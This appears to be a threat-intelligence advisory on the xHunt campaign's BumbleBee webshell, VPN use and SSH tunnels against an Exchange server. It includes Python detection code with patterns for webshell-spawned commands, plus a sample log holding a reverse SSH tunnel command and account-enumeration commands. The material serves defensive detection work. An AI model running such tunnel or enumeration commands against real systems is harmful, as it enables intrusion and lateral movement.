xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement


In September 2020, a detailed investigation into a prolonged xHunt campaign targeting a Kuwaiti organization revealed the presence of a newly discovered webshell named BumbleBee, alongside two other backdoors called TriFive and Snugy. The BumbleBee webshell was notable for its ability to upload and download files and execute commands on the compromised Microsoft Exchange server. The campaign demonstrated a sophisticated level of infiltration, suggesting a well-organized threat actor. The BumbleBee webshell required two passwords for access: one to view the webshell and another to interact with it. This two-password gate protected the attacker's own access, making the webshell harder for anyone else to discover or use. The webshell's color scheme (black, white, and yellow) inspired its name.

Analysis of the attacker's activities revealed a pattern of using Virtual Private Networks (VPNs) provided by Private Internet Access to obscure their true location. They frequently switched between VPN servers located in various countries, indicating a deliberate effort to obfuscate their origin. Additionally, the actor utilized different operating systems and browsers during interactions, further complicating analysis and attribution. The actor employed SSH tunnels to interact with BumbleBee webshells hosted on internal IIS web servers, enabling access to systems not directly accessible from the internet. These SSH tunnels were used for various purposes, including Remote Desktop Protocol (RDP) access and lateral movement within the network.

Commands executed via BumbleBee included network discovery, account enumeration, system time determination, SSH tunnel creation, RDP usage, lateral movement, and evidence deletion. These actions aligned with known MITRE ATT&CK techniques, indicating a deliberate strategy by the threat actor to achieve their objectives while evading detection.
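As an added defender's example (not code from the original report or from the researchers it summarizes), the following Python triages process-creation events for the chain described above: the IIS worker process (w3wp.exe) spawning discovery, system-time, SSH-tunnel or RDP tooling. The JSON field names, paths and sample log are constructed assumptions, not values from the page.

```python
import json
import re

# Constructed sample events in a Sysmon-like JSON-lines shape; field names are assumptions.
SAMPLE_LOG = r"""
{"ts":"2020-09-01T10:00:01Z","parent":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c net user /domain"}
{"ts":"2020-09-01T10:00:07Z","parent":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c time /t"}
{"ts":"2020-09-01T10:02:15Z","parent":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","image":"C:\\Windows\\System32\\OpenSSH\\ssh.exe","cmdline":"ssh.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10"}
{"ts":"2020-09-01T10:03:40Z","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\mstsc.exe","cmdline":"mstsc.exe /v:10.0.0.5"}
{"ts":"2020-09-01T10:04:00Z","parent":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","image":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","cmdline":"w3wp.exe -ap DefaultAppPool"}
"""

IIS_WORKER = "w3wp.exe"
# Tools an IIS worker process has no legitimate reason to launch.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "net.exe", "nltest.exe", "ipconfig.exe",
                       "whoami.exe", "ssh.exe", "plink.exe", "mstsc.exe", "w32tm.exe"}
TUNNEL_BIN = re.compile(r"\b(ssh|plink)(\.exe)?\b", re.I)
# Case-sensitive on purpose: -L/-R/-D forward ports and -N suppresses a shell; lowercase -l is the login name.
TUNNEL_FLAG = re.compile(r"\s-[LRDN]\b")
# Remaining activity classes named in the report, keyed by command-line pattern.
PATTERNS = {
    "rdp": re.compile(r"\bmstsc(\.exe)?\b", re.I),
    "account_enumeration": re.compile(r"\b(net(\.exe)? (user|group)|nltest|whoami)\b", re.I),
    "network_discovery": re.compile(r"\b(ipconfig|net(\.exe)? view|arp|nslookup)\b", re.I),
    "system_time": re.compile(r"\b(time /t|w32tm)\b", re.I),
}

def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Tag one process-creation event with every activity class it matches."""
    tags = []
    if basename(event["parent"]) == IIS_WORKER and basename(event["image"]) in SUSPICIOUS_CHILDREN:
        tags.append("webshell_child")
    cmd = event.get("cmdline", "")
    if TUNNEL_BIN.search(cmd) and TUNNEL_FLAG.search(cmd):
        tags.append("ssh_tunnel")
    tags.extend(tag for tag, pat in PATTERNS.items() if pat.search(cmd))
    return tags

def triage(jsonl):
    """Parse JSON-lines events and return only those that matched at least one tag."""
    findings = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        tags = classify(event)
        if tags:
            findings.append({"ts": event["ts"], "image": basename(event["image"]), "tags": tags})
    return findings
```

On the sample log the webshell-spawned shell, time check and reverse SSH tunnel are flagged, while the interactive mstsc.exe launch is tagged only as RDP and the normal w3wp.exe event produces nothing.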

Security Officer Comments:
Further analysis revealed the reuse of infrastructure across multiple targets, suggesting a consistent modus operandi by the actor. The actor's focus on concealing their location and monitoring for network awareness indicated a high level of sophistication and operational security. The investigation shed light on the tactics, techniques, and procedures employed by the xHunt threat actor, highlighting the importance of robust cybersecurity measures to detect and mitigate such threats effectively.

Suggested Corrections:
Mitigating the threats posed by the xHunt campaign and similar sophisticated attacks requires a comprehensive and proactive approach to cybersecurity. This includes regular patch management to address known vulnerabilities, robust security awareness training to educate employees about common attack tactics, and the implementation of network segmentation to limit lateral movement within the network. Access controls should be enforced to restrict user permissions, while web application firewalls (WAF) and endpoint protection solutions can help detect and block malicious activity. Organizations should prioritize monitoring and logging to detect suspicious behavior, develop and test an incident response plan, and actively participate in threat intelligence sharing communities.